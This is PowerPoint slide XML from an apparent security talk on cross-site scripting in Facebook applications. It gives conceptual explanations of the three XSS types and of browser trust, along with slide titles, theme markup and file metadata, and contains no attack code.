              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold"/>
              </a:rPr>
              <a:t>▪    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold"/>
              </a:rPr>
              <a:t>theharmonyguy@gmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" u="sng" dirty="0">
              <a:latin typeface="Segoe UI Semi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41020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Three types of XSS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Reflected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Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Code injected into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a particular request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Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server dynamically generates modified response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Persistent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Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Code injected into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>static content on the server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Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server always generates modified response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Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM-Based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Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Code injected into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a client-side parameter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Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client dynamically generates modified response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Meet Cross-Site Scripting (XSS)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U-Turn Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="7810500" y="2324100"/>
            <a:ext cx="609600" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="utur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39000" y="4114800"/>
            <a:ext cx="1524000" cy="609600"/>
            <a:chOff x="7162800" y="4191000"/>
            <a:chExt cx="1524000" cy="609600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="U-Turn Arrow 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000" flipV="1">
              <a:off x="7734300" y="3848100"/>
              <a:ext cx="609600" cy="1295400"/>
            </a:xfrm>
            <a:prstGeom prst="uturn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Down Arrow 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000" flipV="1">
              <a:off x="7620000" y="4038600"/>
              <a:ext cx="304800" cy="1219200"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 5566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67600" y="5562600"/>
            <a:ext cx="1371600" cy="609600"/>
            <a:chOff x="7391400" y="5562600"/>
            <a:chExt cx="1371600" cy="609600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="U-Turn Arrow 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000" flipV="1">
              <a:off x="7734300" y="5219700"/>
              <a:ext cx="609600" cy="1295400"/>
            </a:xfrm>
            <a:prstGeom prst="uturn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8458200" y="5562600"/>
              <a:ext cx="304800" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 5566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86600" y="20236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sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent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Server          Client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Meet Cross-Site Scripting (XSS)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3250" name="Picture 2" descr="http://theharmonyguy.com/wp-content/uploads/2009/11/esp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85" y="1447800"/>
            <a:ext cx="8455547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Meet Cross-Site Scripting (XSS)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45554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When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> visits facebook.com, they trust that they’re communicating with Facebook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When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> loads code for facebook.com, it trusts that the code is authorized by Facebook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When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> receives requests from a browser, it trusts that they’re coming from the user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XSS breaks all of these chains of trust</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semi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So What?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12700" h="12700"/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So What?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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/>
        <p:txBody>
          <a:bodyPr lIns="182880" tIns="182880" rIns="182880" bIns="182880"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The Document Object Model (DOM)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Every script has equal access to the global object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Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scripts can perform </a:t>
            </a:r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nearly any action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> a user can…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Segoe UI Semibold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…in a particular domain context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Segoe UI Semibold" pitchFamily="34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Segoe UI Semibold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724400" y="1295400"/>
          <a:ext cx="4191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9171" y="1828800"/>
            <a:ext cx="19800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&lt;head&gt;&lt;/head&gt;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&lt;body&gt;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&lt;div&gt;&lt;/div&gt;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&lt;h1&gt;Hi&lt;/h1&gt;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&lt;p&gt;Click &lt;a&gt;here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&lt;/a&gt;…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uter monitor design template">
  <a:themeElements>
    <a:clrScheme name="Custom 1">
      <a:dk1>
        <a:srgbClr val="080808"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="74C8E6"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="FFFFFF"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="080808"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="68A2B6"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="4192BF"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="BCE0F0"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="060606"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="B9CED7"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A50021"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="3963AF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="000066"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Custom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4C8E6"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="000000"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="080808"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="68A2B6"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="4192BF"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="BCE0F0"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="060606"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="B9CED7"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="3A84AD"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="3963A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65914</TotalTime>
  <Words>1358</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>264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Computer monitor design template</vt:lpstr>
      <vt:lpstr>Slide 1</vt:lpstr>
      <vt:lpstr>Meet theharmonyguy</vt:lpstr>
      <vt:lpstr>Meet the Facebook Platform</vt:lpstr>
      <vt:lpstr>Meet Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Meet Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Meet Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Meet Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>So What?</vt:lpstr>
      <vt:lpstr>So What?</vt:lpstr>
      <vt:lpstr>So What?</vt:lpstr>
      <vt:lpstr>More Than &lt;script&gt;…</vt:lpstr>
      <vt:lpstr>More Than &lt;script&gt;…</vt:lpstr>
      <vt:lpstr>More Than &lt;script&gt;…</vt:lpstr>
      <vt:lpstr>More Than &lt;script&gt;…</vt:lpstr>
      <vt:lpstr>Beyond the Browser</vt:lpstr>
      <vt:lpstr>The Age of Mashups</vt:lpstr>
      <vt:lpstr>The Age of Mashups</vt:lpstr>
      <vt:lpstr>Facebook Apps</vt:lpstr>
      <vt:lpstr>Facebook Apps</vt:lpstr>
      <vt:lpstr>Facebook Apps</vt:lpstr>
      <vt:lpstr>Facebook Apps</vt:lpstr>
      <vt:lpstr>Facebook Apps</vt:lpstr>
      <vt:lpstr>Facebook Apps</vt:lpstr>
      <vt:lpstr>Facebook Apps</vt:lpstr>
      <vt:lpstr>Instant Personalization Sites</vt:lpstr>
      <vt:lpstr>Instant Personalization Sites</vt:lpstr>
      <vt:lpstr>Instant Personalization Sites</vt:lpstr>
      <vt:lpstr>Instant Personalization Sites</vt:lpstr>
      <vt:lpstr>Instant Personalization Sites</vt:lpstr>
      <vt:lpstr>Speaking of Secondary Pages…</vt:lpstr>
      <vt:lpstr>The Difficulty of Blacklisting</vt:lpstr>
      <vt:lpstr>The Difficulty of Blacklisting</vt:lpstr>
      <vt:lpstr>Non-Alphanumeric JavaScript</vt:lpstr>
      <vt:lpstr>Non-Alphanumeric JavaScript</vt:lpstr>
      <vt:lpstr>The Great JS Wall</vt:lpstr>
      <vt:lpstr>The Great JS Wall</vt:lpstr>
      <vt:lpstr>The Great JS Wall</vt:lpstr>
      <vt:lpstr>DOM-Based XSS</vt:lpstr>
      <vt:lpstr>DOM-Based XSS</vt:lpstr>
      <vt:lpstr>The Future</vt:lpstr>
      <vt:lpstr>Slide 41</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Wake Forest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Facebook Applications</dc:title>
  <dc:creator>Joey A. Tyson</dc:creator>
  <cp:lastModifiedBy>Joey Tyson</cp:lastModifiedBy>
  <cp:revision>1206</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-15T01:56:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-04-12T01:59:03Z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TC011408351033</vt:lpwstr>
  </property>
</Properties>
</file>